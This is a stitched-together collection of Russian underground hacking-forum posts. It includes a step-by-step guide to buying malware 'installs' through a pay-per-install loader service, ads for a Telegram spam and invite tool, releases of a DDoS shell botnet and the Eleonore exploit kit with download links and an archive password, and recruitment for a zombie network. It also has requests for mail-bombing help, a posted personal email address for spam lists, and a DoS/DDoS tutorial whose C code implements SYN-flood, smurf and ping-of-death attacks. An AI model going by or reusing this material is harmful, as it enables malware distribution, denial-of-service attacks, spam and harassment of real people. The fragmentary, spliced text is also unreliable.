“лоадер” — быть не должно.
“Сохранить файл как” — пишем как есть, например “Setup.exe”.
“Чекбоксы” — пишем: “Устанавливая “название программы”, я соглашаюсь с
условиями {лицензионного
соглашения|http://прямая_ссылка_на_ваше_соглашение.com/}”.
Ниже, в условиях установки добавляем условия.
Запрещаем установку, если:
⠀⠀1. “Ветка в реестре существует” — если на ПК уже запускался ваш “лоадер”,
повторно не встанет.
⠀⠀2.“Имя процесса” — та же функция, только по имени процесса. Например,
процесс майнера или ботнета. Можно добавить несколько.
Все ваши компании будут избегать друг друга. Если при запуске будет обнаружен хоть один процесс из вашего списка “Инсталл” не засчитается и главное — не потратит денег, если на ПК уже стоит чей-то зверек. Это гарантирует чистый трафик и никаких десяти майнеров, пяти ботнетов и трёх стиллеров на одном ПК от разных людей.
В “условиях проверки успешности установки” добавляем ветку реестра, которую создает “лоадер”.
Параметры устанавливаются по вашему усмотрению и личным предпочтениям.
Важно!
В таргетинге по странам есть обычный микс и топ стран — последний будет
дороже. Минимальная плата за 1000 инсталлов на топ страны — 80$, в миксе ~
33$.
Опускаясь ниже, видим лимиты на инсталлы:
Если льете себе — оставляйте поля пустыми и переходите к “Стоимости”.
Если вы селлер — нужно установить лимиты, чтобы случайно не налить лишних.
Ставьте 1000/день и лейте проданную 1000. Когда долили, останавливаете
кампанию, меняете файл “малвари” которую качает “лоадер” на новый,
увеличиваете лимит до 2000 и возобновляем кампанию. На новый файл снова
зальется 1000.
Без топ стран, минимум 2000р. Больше — по желанию, от этого зависит
исключительно скорость залива.
Для топа стран, таких как: “US, CA, GB, AU, FR, DE, IT” ~ 5000р.
Сохраняем. Во вкладке “Кампании” видим созданную кампани.
Сразу после создания, статус будет — “новая”. После проверки модератора, статус станет “одобрено” как на скрине. Ждём.
Кампания прошла проверку. Заливаем “малварь” на место, чтобы она скачивалась “лоадером” по указанной вами ссылке.
Инсталлы льются. Пауза ставится той же кнопкой.
Готово. Вы прекрасны, как молодой Адонис, сеньор.
Посчитаем.
1000 mix инсталлов у продавца — 70$ , самое дешевое из найденного на
форуме.
1000 mix инсталлов через Installcube — 32$ (2000 рублей).
1000 US инсталлов у продавца — 150$ , самое дешевое из найденного на
форуме.
1000 US инсталлов через Installcube — 78$ (4900 рублей).
копирайт Vacation
взято с exploit
1. Кароч для начала создаем фейк страницу не на ваш номер, лучше купить..
2.В ступаем в огромное кол. Популярных пабликов.
3.Ставим фото интим, делаем двойную фотку, кто не шарит ютуб в помощ.
Люди видя интим часто заходят к вам на стр. А дальше создаем пост на стене
например сайт, рефку и тд. И все..
Написал с телефона так что
**Telegram Tools 2.61 **- Приватный комбайн со множеством функций.
_Парсер/Спамер/Инвайтер/Массовый фолловинг/Накрутка просмотров и многое
другое.
_
Меню софта:
Инвайтер:
Инвайтер можно гибко настроить под любое использование. Это идеальный
инструмент для заработка на заказных инвайтах живой аудитории или для развития
своей группы.
Инвайтер умеет менять профиль на следующий и продолжать инвайт с него на
заданных условиях.
Спамер:
Спамер умеет рандомизировать текст, спамит и в ЛС и в чаты. Также он рассылает
не только текст, но и документы/картинки.
Умеет как и инвайтер менять профиль после определённого кол-ва отправлений
сообщений.
Имеет авторандомную настройку задержки и приписывание + к логинам уже
проспамленных.
При след. спаме люди с плюсами спамиться не будут.
Парсер:
Парсер этот парсит самых активных с группы по убыванию. Работает как с
супергруппами, так и приватными. Он медленнее нового парсера, но есть группы,
которые не парсит новый, тут приходит на помощь этот парсер.
Парсер ЧАТОВ по тэгам:
Удобный просмотр информации каждого аккаунта.
Telegram Tools 2.61 поддерживает ТОР проксификацию.
Также, софт не требует прокси, т.к. берёт их сам с сервера для работы.
Spoiler: Заработок
Зарабатывать на софте можно многими способами, которые описаны в мануале,
который идёт в комплекте.
Вот некоторые способы:
1. Платный инвайт. На многих форумах люди предлагали инвайт в группы, но
софты которыми они это делали умерли и теперь админы нуждаются в инвайте
сильнее. Вы можете взять их заказы себе с этим софтом и инвайтить 1 подписчика
за 2р. В день сможете инвайтить хоть 10к человек.
2. Раскрутка своих групп. Тут всё понятно, набиваете группу участниками и продаёте рекламу, но профит не сразу, т.к. нужна раскрутка.
3. Работа с трафиком и ПП. С софта вы можете рассылать тотальное кол-во СМС/Инвайтов и т.д., привлекая людей, думайте сами как это монетизировать.
**Также имеется панель регистраций аккаунтов через Telegram Portable и СМС- Сервисы
**
Spoiler: Мелочи
**1. Многопоточный и мультипрофильный. Возможность работать с неограниченным
кол-вом аккаунтов.
2. Сохранение куков. Каждый раз перезаходить в аккаунт не нужно. Авторизация
сохраняется.
3. Рандомизация текста. + Выбор: Рандомный подбор или по списку. Спамер
рассылает и документы и текст.
4. Работоспособнее и дешевле аналогов.
5. Не требуются прокси, софт сам подменяет для каждого действия и не
передаёт ТГ информацию об IP.
5.1. Возможность задать свой User Agent. [01.05.2018] Что это
такое? **
6. Абсолютная имитация человеческого поведения. Рандомизация задержек между
выполнениями процедур, уменьшение вероятности бана.
7. Можно настроить смену аккаунтов. Инвайтер/Спамер и т.д. меняют аккаунт
после заданных условий. (Например, после 50 инвайтов)
8. Инвайтер имеет хорошую скорость.
9. Софт работает теперь и с ссылками инвайт-чатов приватными! [28.05.2018]
10. Софт не видит разные мусорные логины из чатов и т.д., парсит только
целевых участников.
11. Добавлена автосмена аккаунтов при спаме.
11.2. Добавлена автосмена в инвайтере, когда профиль словил мут/бан.
Вы указываете через сколько сообщений менять аккаунт и каждые n сообщений
аккаунт меняется на следующий.
12. Добавлена автосмена аккаунта в инвайтере. [20.06.2018]
Вы указываете через сколько инвайтов менять аккаунт и каждые n инвайтов
аккаунт меняется на следующий.
13. Можно выбирать, по сколько за раз инвайтить. Можно по 1, можно по 20
пачкой. [23.06.2018]
14. Появился очень подробный лог у инвайтера. [23.06.2018]
15. Доработаны кнопки "Запустить" и "Остановить" для инвайтера.
[23.06.2018]
16. Теперь в инвайтере можно удалять использованные логины из базы.
[29.06.2018]
**
Работа инвайтера на видео:
**
** Цена :3000р.
Лицензия : Навсегда.
Обновления : Бесплатно.
_Поддержка : _Есть.
В комплекте Вы получаете мануал со всем необходимым материалом для работы.
Со всей информацией и ответами на многие вопросы.
После покупки мы добавляем вас в канал, где Вы сможете видеть и получать все
обновления. Также в чат, где сможете общаться и узнавать всё нужное.
_
_**
Контакты :
@teletools_sale
**
Сверяйте контакты, не попадайтесь на мошенников !
**
** На гаранта всегда согласен.
**
Привет ребята .
В этой теме я расскажу о том как пользоваться Proxy (Прокси-сервер — служба в
компьютерных сетях, позволяющая клиентам выполнять косвенные запросы к другим
сетевым службам.) в телефоне (через Сим - карту ) и ( Wi-fi).
Данная функция не работает на Iphone - ах почему хрен его знает.
Ну что же приступим .
В России повысили цены на интернет поэтому все жмутся на подключение дорогих
провайдеров типа Ростелекома и тех других.Как я сказал превыше Прокси-сервер —
служба в компьютерных сетях, позволяющая клиентам выполнять косвенные запросы
к другим сетевым службам имбовая ху*ня подумайте ?
Но в некоторых Регионах как СНГ трудно обходится с интернетом который все
время лагает,не слушается и игнорит.
Я честно сейчас пользуюсь Proxy сервером потому что мне трудно использовать
500 kb внешки которая еще и раздается по WIFI. Прокси искать очень легко в
гугле вписывайте Прокси (ваш город) и все находит,берете Прокси и Порт изи.
Не все таки надо купить себе Proxy на заказ он везде есть ( он легкодоступнный
).
Так как же пользоваться Proxy через WIFI.
В картинке указано где можно ввести Proxy сервер.
Для каждых Регионов Proxy своего рода разный.В России мало пользуются Proxy
серверами,В Америке тем более не используют а вот в СНГ и Африке в нем
нуждаются.
Так где же находятся эти Надстройки. Входите в Настройки Соединение (у
некоторых по другому) WIFI выбираем сеть и открываем Настройки Сети WIFI потом
там уже написано Надстройка Прокси Сети.
И еще Прокси Сервера работают в любых провайдерах сети включая Лимитные Сети.
А вот как Пользоваться Прокси Серверами в Сим Картах эта другая тема.
Представьте что у вас Работает стабильный Прокси Сервер на WIFI у которого
скорость 1 mb/сек а если ввести этот прокси сервер в Прокси Сервер Симки то
скорость интернета снизится на 50,60 % вот это поворот.... Но все таки это
нормально тем как не мучатся над посиделками у интернета и просить у него
большее .
Всем добро !
p.s так не где не делайте это не законно всё
**
**
p.s во втором надо просто через папку раздавать файл как проверят его
Попался мне тред на одном из бордов по сабжу.
Вот собс-но сам линк на пак:
Spoiler: 10
https://styx-crypt.com/ru/read/styxpack.xml
Кто юзал, какие впечатления?
З.Ы. Запостил сюда: может сразу будет кандидат на обзор
Сильно не кричите я новичек в этом деле, но хотелось бы знать, реально ли
грузить через паблик?
Спасибо!
ex204 DDos System
Замечательный релиз от наших коллег с cup.su представляет собой небольшой шелл
ботнет (или как модно говорить - система распределения мощностей).
Пакет состоит из Get DDOS модуля на Perl, установщика скрипт-ботов и контроль-
центра. В скриптах заведомо допущена ошибка, так как всё афишируемое создано
только для личного ознакомления и предупреждения опасных ситуаций в сети.
Тестирование было произведено с использованием Perl v5.8.8 built for
MSWin32-x86-multi-thread и PHP 4. Для корректного функционирования потребуются
два текстовых файла Bots.txt и Shells.txt.
Скрипт системы поможет протестировать ваши приложения и ПО на традиционную
флуд-атаку GET запросом.
Закачка далее>>>[New$paN]
Скачать|Download
Релиз был кинут авторами в паблик на cup.su в связи с чрезмерным интересом
барыг к нему.
Ошибся с датой, это версия февральская, возможно что не 1.4.1, а 1.3.4 к
примеру.
От версии 1.3.3 отличается джава сплоитом и добавленным FLASH10 слпоитом
Поползло по интернету
Взято с opensc.ws
Spoiler: 100
http://www.opensc.ws/trojan-malware-samples/11251-eleonore-1-4-1-a.html
Копия:
Spoiler: 100
http://www.sendspace.com/file/r67dj9
Spoiler: 100
Аккуратно, вставки
в exp.php к примеру вставка в флеш сплоит, фрейм на линк
http://domx0.cn/arend_my/load.php?spl=not
P.S. На очереди Crime Pack, кто поделится?
[mod]el-: не ставьте хайд в один пост, если стафф дешевый не ставьте хайд вообще, если же имеет ценность то ставьте хайд от сотни, избавьте модераторов от зачисток "постов благодарности" и тех кто набивает посты[/mod]
Spoiler: 50
Восстановленный по слитым exp-ам
За базу брал версию 1.4, статистику оригинальную можете оттуда же взять.
el- в своём разборе выкладывал сплоиты именно 2.0fin, я слил с 2й beta, лоханулся))
По установке читайте Readme.txt
Вкратце:
- Редактируем configuration/config.php
- install.php
- recrypt.php => генерятся експлоиты в папке $TMPDIR="tmp" (правится в
config.php)
- gen_pdf_all.php => tmp/all.pdf, если лениво возиться дальше, копируем его в
collab.pdf, geticon.pdf, printf.pdf
От аверов не чистил, сплоиты/swf не палятся, pdf палится, java частично палится.
Spoiler: 300
http://www.sendspace.com/file/2sp20f
File: spl_expl.rar
Pass: hdflabntlwFDALJKIbopyb542gsa
Я очень слабо разбираюсь в этой теме, не совсем понимаю, по какому принципу работает данная сфера деятельности, и хотелось бы пару вопросов уточнить.
Договорился я с одним известным продавцом загрузок о покупке 50 инсталлов
своего .exe за пару $ для теста, чтобы знать что это такое и как работает.
Грузил я своего самопального бота через пару кило-байтовый лоадер, который
устанавливал в систему бота.
А устанавливал он его банальным способом.
Значит было загружено 60 инсталлов, при этом реальный отстук моего бота был ровно 20 человек, из 60 успешных инсталлов отстучало 20, ну насколько мне известно это вприципе нормальная практика, вроде бы.... (кстати все 20 были исключительно за NAT’om)
Но самое интересное было на следующий день, когда в админку отстучались всего 3 человека, а остальные попросту с концом пропали, и вот это меня очень интересует, каким образом такое могло получиться? Было ли у кого такое в практике?
Я рассматриваю все логические варианты как такое могло произойти, ну например начав с себя.
Но если посмотреть в сторону продавца, то я тоже не могу предположить, если он
это сделал преднамеренно, то каким образом?
ну допустим он загрузил 60 загрузок через свой ботнет, а потом каким то
образом отключил моего бота?
Крайне странно, можно ли так сделать вообще?
Я предполагаю один единственный вариант, это загрузка моего .exe через спец
ботнет, который запускает его в своей виртуальной среде, а потом делает откат,
других логических объяснений я не вижу.
Просьба тем, кто работает по загрузкам, напишите пожалуйста, по какой причине происходит отваливание всех приобретенных загрузок? Это может быть из за недобросовестности селлера, или же тут что то ещё?
Посоветуйте сабж, был d1ez, больше не поддерживается. что еще есть ? :help:
Project “Symbiotic” is created for association of world hacker groups in the uniform controllable union, our purposes a reconstruction of an elite cybernetic network for management of global processes in the Internet space. We participate in formation of analytical opinion on cyberwars and as we influence independent sources of means in weight of the information in sphere of cybernetic technologies. For sharing in system "Symbiotic" you can contact the representative in your country. The purposes and a problem: We create an anonymous cybernetic network for management of global processes of mass media, and as other analytical communities. Our system has a network of the zombie on which means, any hacker communities participating in movement, can have the necessary information for their development and as to influence any global processes. You can become partners of a network of the zombie for their functional expansion and sharing under formation to a global cybernetic network. If you have skills of work with networks of the zombie and can develop and as to support them, you awake are pleasantly surprised by our amicable and practical quota. We wait for your active sharing in process of construction of the project “Symbiotic”. You can find other information on sites of community of hackers worldwide.
Проект Symbiotic создан для объединения мировых хакерских групп в единый контролируемый союз, наши цели воссоздание элитной кибернетической сети для управления глобальными процессами в Интернет пространстве. Мы участвуем в формировании аналитического мнения о кибернетических войнах, а так же влияем на независимые источники средств массой информации в сфере кибернетических технологий. Для участия в системе “Symbiotic” вы можете связаться с представителем движения или создателем форума. Цели и задача: Мы создаем анонимную кибернетическую сеть для управления глобальными процессами средств массовой информации, а так же других аналитических сообществ. Наша система имеет сеть зомби по средствам которой, любые хакерские сообщества, участвующие в движении, могут получать необходимую информацию для их развития, а также воздействовать на любые глобальные процессы. Вы можете стать партнерами сети зомби для их функционального расширения и участия в процессе создания глобальной кибернетической сети. Ждем вашего активного участия в процессе построения проекта “Symbiotic”. Остальную информацию вы можете найти на сайтах сообщества хакеров.
Separate thanks and respect to the founder of the given forum to a "lonely wolf".
Надо, что бы после каждой отправки в jpg-письме менялся например цвет фона или шрифт в теле письма и заголовке. Спасибо всем!
Предлогаю в этой теме бросать e-mail'ы всяких не хороших людей, редисок, в
общем...
С целью добавления их в спам-базы!!! :diablo:
------------------------------
vitaliydyshlovy@mail.ru
------------------------------
Собственно нужен сабж.
Если у кого есть дайте ПЛЗ ICQ флудер...
Ну собственно есть у меня база на 195300 E-mail адресов, вот ссылка для
скачки:
http://slil.ru/22703613
Пароль на архив:
100wmz
( это именно пароль, а не цена пароля
)
Удачи :excl:
народ выручайте
нужный рабочие варианты дял таргетного маилбомбинаг 1 мыльника на разных
серверах
(хотмыло, яху, гугл и тд)
главное чтоыб мыла попадали в инбокс, были с рандмоным текстом\отправителем
идеально елси их там 1-2к залезет
для решения задачи имеется: уйма фтп хостов
руты
сокс5 сервера
немного денег
)
если есть готвоые решения - отпишитесь
сенкс
PS: неспешно ищутся програмные комлпексные решения для мелкого (МЕЛКОГО!) спама, без излишних примудростей (не претендую на сервис или звание топ1 спамер)
Первоночальные тех возможности теже, под мелки спамом подразумевается спам по своим имаилам в колличестве 100-300к в неделю
Нужна прога, которая из текста выдерает только E-mail адреса :excl:
Например есть дамп базы с форума, оттуда нужно вытащить E-Mail Посоветуйте,
какой прогой сделать?
Буду очень благодарен если ссылку на прогу сюда кините или в ПМ :excl:
Привет всем .
Мне нужна прога по рассылке почты , ток что-то
нигде найти не могу . Мне не для массового спама , у меня
ток около 50 мыл , на которые надо кое что послать .
Нашёл одну под названием skynet mailer 1.7 , ток crack'a нигде нет ..
Подскажите откуда можно взять :/
жду :help:
Откажи в обслуживании! / Атаки на отказ в обслуживании DoS и DDoS
Автор: 1nf3ct0r (dr.pascal@mail.ru)
Здравстувуйте, в этой статье я намерен рассказать о атаках на отказ в
обслуживании. На сегодняшний день очень опасными атаками хакеров являются DoS
и DDoS. А главная цель атаки - остановить передачу сетевого траффика и обмен
данными с web-сайтами, а также блокировать работу хостов, от имени которых
будет действовать хакер. То есть, остановить работу сайта на некоторое время.
Давайте разбремся с принципом атак грубой силы - DoS/DDoS
Начнем с DoS-атаки, младшего брата DDoS'a
[[DoS-атаки]]
Итак, что такое DoS?
DoS (Denial of Service) - нет, это не операционная система
,
а "атака на отказ в обслуживании". Главная цель атаки - остановить передачу
сетевого траффика и
обмен данными с web-сайтами, а также блокировать работу хостов, от имени
которых будет действовать хакер.
Хочу сказать сразу - организовав атаку DoS - ты не получишь root-привелегий
))).. Принцип рыботы: сервер получает пакет. Систем его обрабатывает. Приходит
следующий - и становится "в очередь". Так и занимаются ресурсы системы и он
попросту перегружается, при этом он либо отключается от интернета, либо
зависает. При проведения DoS-атаки, пакеты отсылаются с ОДНОГО (это важно!)
компьютера.
Таблица видов DoS-атак:
/----------------------------------------------------------------------------------------------------------------------------\
| DoS-атаки |
\----------------------------------------------------------------------------------------------------------------------------/
/ | \
/ | \
/ | \
/----------------------------------\ /-------------------------------
/--------------------------------------------\
| Флудинг - отсылка | | DoS-атаки | | Программный DoS - |
| большого | |на уровне ядра | |использование уязвимостей |
| количества | | почти тоже, что и | |найденных в программном |
|сетевых пакетов | | ПО-DoS | |мном обеспечении |
\---------------------------------/ \-------------------------------/
\--------------------------------------------/
Сначало рассмотрим флудинг.
[Флудинг]
В нее входят такие податаки как: Ping of Death,
ICMP-flooding, SYN-flooding, UDP-flooding и все другие, благодаря которым
можно приостановить работу ресурса, заваливая его большим количеством сетевых
пакетов. Пакеты необязательно могут быть "кривыми", но и "прямыми" )) - даже
от большого количества GET-запросов для HTTP-сервера можно завалить сайт.
Также успех атакаи зависит от мощности канала. Если канал слабый - то можно
его повалить простым ICMP-флудингом, если сильный - то поверь, без DDoS'a не
обойтись...
TCP-флудинг
TCP flood - это вид атаки, при которой компьютеру, который нужно атаковать, отсылаюся TCP-пакеты, что приводит к связыванию системных ресурсов.
ICMP-флудинг
ICMP-flooding (Ping-flooding) - осуществляется при помощи стандартной утилиты
Ping (есть в Windows и UNIX - системах =). Вот как выглядит атака на практике:
ping -f -s 3072 lamer.target.ru. - Этот запрс будет беспрерывно отправлять
компьютеру по 3Kb (флаг -s), причем с максимальной скоростью (флаг -f). Чем
больше пактов было утеряно - тем эффективнее была атака =)
Например, я решил вывести из строя моего провайдера (это было и в правду)
начал DoS'ить его, заваливая ICMP-пакетами. Так вот, пошел налить кофе,
пришел, посмотрел - 75% пакетов потеряно - атака была успешной! Э! Эээ! Куда
спешишь microsoft валить ))????
Реализация:
Для реализации атаки мы юзаем прогу ping, которая входит в стандартный набор
как windows так и nix-систем.
SYN-флудинг
SYN-flooding - это такой вид DoS-атаки (рульный =), которое позволет
блокировать работу любой TCP-службы, если хакер сможет отправить SYN-пакеты со
скоростью,
достаточной для поддержки очереди в заполненном состоянии. Результатом SYN-
наводнения может оказаться ситуация, при которой юзеры не могут
подключиться к web-серверу или даже замедляется доступ по локальной сети.
Заголовок IP пакета, который можно использовать в атаке типа SYN Flood
Code:Copy to clipboard
/* -------------IP-3аголовок пакета--------------------------- /*
packet.ip.version=4; // Версия
packet.ip.ihl=5; // Длина заголовка
packet.ip.tos=0; // Тип сервиса
packet.ip.tot_len=htons(40); // Общая длина
packet.ip.id=getpid(); // Идентификатор
packet.ip.frag_off=0; // Смещение фрагмента
packet.ip.ttl=255; // Время жизни
packet.ip.protocol=IPPROTO_TCP; // Протокол
packet.ip.check=0; // Контрольная сумма
packet.ip.saddr=saddress; // Адрес источника
packet.ip.daddr=daddress; // Адрес назначения
/* ----который можно использовать для SYN-флудинга-----/*
/* ---КОД, ДЛЯ РЕАЛИЗАЦИИ SYN-ФЛУДИНГА. ---/*
// TPC/IP заголовок
struct send_tcp
{
struct iphdr ip;
struct tcphdr tcp;
} send_tcp;
// заголовок
struct pseudo_header
{
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
} pseudo_header;
int i;
int tcp_socket;
struct sockaddr_in sin;
int sinlen;
// формирование IP-пакета
send_tcp.ip.ihl = 5;
send_tcp.ip.version = 4;
send_tcp.ip.tos = 0;
send_tcp.ip.tot_len = htons(40);
send_tcp.ip.id = getpid();
send_tcp.ip.frag_off = 0;
send_tcp.ip.ttl = 255;
send_tcp.ip.protocol = IPPROTO_TCP;
send_tcp.ip.check = 0;
send_tcp.ip.saddr = source_addr;
send_tcp.ip.daddr = dest_addr;
// формирование TCP-пакета
send_tcp.tcp.source = getpid();
send_tcp.tcp.dest = htons(dest_port);
send_tcp.tcp.seq = getpid();
send_tcp.tcp.ack_seq = 0;
send_tcp.tcp.res1 = 0;
send_tcp.tcp.doff = 5;
send_tcp.tcp.fin = 0;
send_tcp.tcp.syn = 1;
send_tcp.tcp.rst = 0;
send_tcp.tcp.psh = 0;
send_tcp.tcp.ack = 0;
send_tcp.tcp.urg = 0;
send_tcp.tcp.res2 = 0;
send_tcp.tcp.window = htons(512);
send_tcp.tcp.check = 0;
send_tcp.tcp.urg_ptr = 0;
// установки SIN
sin.sin_family = AF_INET;
sin.sin_port = send_tcp.tcp.source;
sin.sin_addr.s_addr = send_tcp.ip.daddr;
// открываем сокет
tcp_socket = socket(AF_INET, SOCK_RAW,
IPPROTO_RAW);
for(i = 0; i < numsyns; i++)
{
// Устанавливаем изменяемые поля
send_tcp.tcp.source++;
send_tcp.ip.id++;
send_tcp.tcp.seq++;
send_tcp.tcp.check = 0;
send_tcp.ip.check = 0;
// считаем контрольную сумму IP
send_tcp.ip.check = in_cksum((unsigned
short *)&send_tcp.ip, 20);
// Устанавливаем поля заголовка
pseudo_header.source_address =
send_tcp.ip.saddr;
pseudo_header.dest_address =
send_tcp.ip.daddr;
pseudo_header.placeholder = 0;
pseudo_header.protocol = IPPROTO_TCP;
pseudo_header.tcp_length = htons(20);
bcopy((char *)&send_tcp.tcp, (char
*)&pseudo_header.tcp, 20);
send_tcp.tcp.check = in_cksum((unsigned
short *)&pseudo_header, 32);
sinlen = sizeof(sin);
// шлем пакет
sendto(tcp_socket, &send_tcp, 40, 0,
(struct sockaddr *)&sin, sinlen);
}
close(tcp_socket);
/* ---КОД, ДЛЯ РЕАЛИЗАЦИИ SYN-ФЛУДИНГА--- /*
UDP-флудинг
UDP-flooding - это усиленный вид DoS-атаки, при котором с помощью отправки
паета на echo-порт одного из ПК, например, lamer.a.target.ru, с подложным
IP-адресом отправителя, указывающим на chargen-порт на другом ПК, напрмер
lamer.b.target.ru. Это позволит организовать замкнутый цикл обмена
UDP-пакетами, отправляющимися с максимально возможной скоростью, в
зависимостим от пропускной способности между двумя хостами
SMURF-флудинг
Эта атака закидывает компьютер ICMP широковещательными запросами от имени жертвы, и благодаря этому относится к наиболее опаснейшой атаке DoS. Запрос направляется либо на сетевой адрес, либо по адресу широковещательной рассылки, но в любом случае устройство должно выполнить преобразование уровня 3 (IР) к уровню 2 (сетевой), как этого требует RFС 1812 "Requirements foг IР Version 4 Routers" (Требования к маршрутизаторам протокола IР вер- сии 4).
В стандартной сети класса С (24-разрядное выделение адресов) сетевым адресом будет .0, а адресом широковещательной рассылки – .255. Прямая широковещательная рассылка обычно служит для диагностики, позволяя выявить работающие системы без запроса по рing каждого адреса из диапазона.
Атака smurf пользуется особенностями прямой широковещательной рассылки и требует как минимум трех участников: атакующий, усиливающая сеть и жертва. Атакующий посылает мистифицированный пакет IСМР ЕСНО по адресу широковещательной рассылки усиливающей сети. Адрес источника этого пакета заменяется адресом жертвы, чтобы представить дело так, будто именно целевая система инициировала запрос. После этого происходит следующее - поскольку пакет ЕСНО послан по широковещательному адресу, все системы усиливающей сети возвращают жертве свои ответы (если только конфигурация не определяет другого поведения). Послав один пакет IСМР в сеть из 100 систем, атакующий инициирует усиление атаки DoS в сто раз! Коэффициент усиления зависит от состава сети, поэтому атакующий ищет большую сеть, способную полностью подавить работу системы-жертвы.
В данной статье можно рассмотреть следующий пример: предположим, что атакующий послал 14 Кбайт непрерывного трафика IСМР на широковещательный адрес усиливающей сети, содержащей 100 систем. Сеть атакующего подключена к Интернету двухканальным соединением ISDN, усиливающая сеть – линией ТЗ со скоростью обмена 45 Мбит/с, а сеть-жертва – линией Т1 (1.544 Мбит/с). Подсчет показывает, что атакующий может сгенерировать трафик 14 Мбит/с в целевой сети, у которой практически не останется шансов продолжить нормальную работу, поскольку будет полностью занята вся полоса пропускания линии Т1. Одним из вариантов атаки является fraggle (осколочная граната). Эта атака базируется на smurf, но использует пакеты UDР вместо ICМР.
Атакующий посылает обманные пакеты UDР по адресу широковещательной рассылки усиливающей сети, обычно на порт 7 (эхо). Каждая система сети, в которой разрешен ответ на эхо-пакеты, возвратит пакеты системе-жертве, в результате чего будет сгенерирован большой объем трафика, Если в системах усиливающей сети запрещены эхо-ответы, системы будут генерировать сообщения IСМР о недостижимости, и полоса пропускания все равно будет захватываться ненужным трафиком. Специалисты по сетевой безопасности рекомендуют предпринять следующие контрмеры: чтобы предотвратить эффект усиления позволит запрет операций прямой широковещательной рассылки на всех граничных маршрутизаторах. Дополнительно можно установить в операционной системе режим "тихого" отброса широковещательных эхо-пакетов IСМР.
Рассомтрим код, созданный для реализации smurf-флудинга:
Code:Copy to clipboard
/* ---КОД, ДЛЯ РЕАЛИЗАЦИИ SMURF-АТАКИ--- /*
void smurf (int sock, struct sockaddr_in
sin, u_long dest, int psize)
//IP-заголовок
struct iphdr *ip;
//ICMP-заголовок
struct icmphdr *icmp
char *packet;
packet = malloc(sizeof(struct iphdr) +
sizeof(struct icmphdr) + psize);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *) (packet + size-
of(struct iphdr));
memset(packet, 0, sizeof(struct iphdr) +
sizeof(struct icmphdr) + psize);
//Заготовка IP-пакета
ip->tot_len = htons(sizeof(struct iphdr) +
sizeof(struct icmphdr) + psize);
ip->ihl = 5;
ip->version = 4;
ip->ttl = 255;
ip->tos = 0;
ip->frag_off = 0;
ip->protocol = IPPROTO_ICMP;
ip->saddr = sin.sin_addr.s_addr;
ip->daddr = dest;
ip->check = in_chksum((u_short *)ip, size-
of(struct iphdr));
//Заготовка ICMP-пакета
icmp->type = 8;
icmp->code = 0;
icmp->checksum = in_chksum((u_short
*)icmp, sizeof(struct icmphdr) + psize);
//Засылаем пакет
sendto(sock, packet, sizeof(struct iphdr) +
sizeof(struct icmphdr) + psize
0, (struct sockaddr *)&sin, sizeof(struct
sockaddr));
free(packet);
}
/* ---КОД, ДЛЯ РЕАЛИЗАЦИИ SMURF-АТАКИ--- /*
[DoS-атаки на уровне ядра]
Ping of Death
Атаку ping of death можно отнести и к флудингу, но я выделил ее (и не тоько я!) в связи стем, что она использует технику, связанную с атакой на уровне ядра.
Ping of Death - вид DoS-атаки (правда, уже староватый), при котором некоторые программы позволяют отправлять пакеты размером больше 65536-байт - максимальный размер пакета, который предусмотрен TCP/IP (хехе TCP/VIP, шутка 8)))). Эти пакеты не могут передаваться по Internet в целом виде, поэтому перед передачей выполняется их фрагментирование. Когда атакуемый хост получает фрагменты пакетов, он восстаноавливает пакет недопустимого размера. Основывается на ICMP-flooding, однако усиливает атаку за счет того, что ping- запросы пересылаются по адресу широковещательной рассылки. Используемый в пакетах запроса адрес - это адрес атакуемого сервера. Получившие такие "посылки смерти" системы отвечают на них и забивают жертву. Это очень серьезный вид атаки, который, правда, требует длительной подготовки. Кстати, переводится "Ping of Death" как "Звон смерти" )
Реализация:
Code:Copy to clipboard
/* ---КОД, ДЛЯ РЕАЛИЗАЦИИ атаки Ping of Death--- /*
#ifdef REALLY_RAW
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
// . . .
//Готовим ICMP-пакет
icmp->icmp_type = ICMP_ECHO;
icmp->icmp_code = 0;
icmp->icmp_cksum = htons(~(ICMP_ECHO <<8));
for (offset = 0; offset < 65536; offset +=
(sizeof buf - sizeof *ip))
{
// считаем смещение
ip->ip_off = FIX(offset >> 3);
if (offset < 65120)
ip->ip_off |= FIX(IP_MF);
else
ip->ip_len = FIX(418);
// отправляем пакеты
sendto(s, buf, sizeof buf, 0, (struct sockad-
dr *)&dst, sizeof dst);
// корректируем смещение
if (offset == 0)
{
icmp->icmp_type = 0;
icmp->icmp_code = 0;
icmp->icmp_cksum = 0;
}
}
/* ---КОД, ДЛЯ РЕАЛИЗАЦИИ PoD'a--- /*
[Программный DoS]
Как я уже сказал, для DoS-атаки можно использовать и уязвимости в программах. Обычно эти уязвимости - уязвимости типа переполнения буфера. Достаточно всего лишь отослать код, который и выполнит DoS-атаку на сервере Я не буду говорить о многочисленных DoS-дырах в Apache и т.д. А для твоего потрясения приведу уязвимость. Да простят меня www.securitylab.ru, за заимствовании у них этого материлала про баг в winamp'e. Да, найдена DoS и в winAMP'e... Теперь он DoS'AMP ))
Если ты захотел изучить DoS от и до, то появляйся на багтраках. Там чуть ли не
ежедневно публикуются уязвимости, приводящие к DoS'у. Заходи на тотже
seuritylab.ru ))
Я рассказал не о всех DoS-атаках как ты понял. А именно о других видах
флудинга
[Защита от DoS-атак]
Грамотной защитой от DoS-атак является:
Хорошо настроенный файрвол (он же брандмауэр)
Постоянно обновляемый софт
И вроде бы все ))
[Вывод]
Итак, мы рассмотрели DoS-атаку, и её реализации. Конечно, можно взломать сервер и выполнить команду rm -rf, удалив все файлы, но сначало же надо полусить root-привелегии. А используя DoS-атаку, можно и не прикосаться к взлому. Обычно для атаки используется мощный канал, дабы повысить уровень "дестроя" от DoS-атак. Также, используй технику IP-спуфинга, чтобы скрыть свой IP-адресс. К сожалению (или счастью???) такие атаки успешно блокируются файрволами, т.к атака проводится с одного компьютера! Но вскре на смену DoS- атаке пришел DDoS.
Я совсем немного поведал тебе о DoS-атаках, надеюсь, что для DDoS ты уже созрел. Банзай!
[[DDoS-атаки]]
Теперь мы перешли к нашей главной цели статьи - DDoS-атаки. Например, кому-то понадобилось, чтобы сайт example.com не работал час/день/и т.д/. Так вот, заказчик стучится тебе в ICQ и говорит о том, что надо остановить работу example.com на 5 часов. Для этого исуществует DDoS. Но если такчка слабая, то можно DoS'ом обойтись...
Что такое DDoS? DDoS (Distributed Denial of Service) - "Распределенная атака в
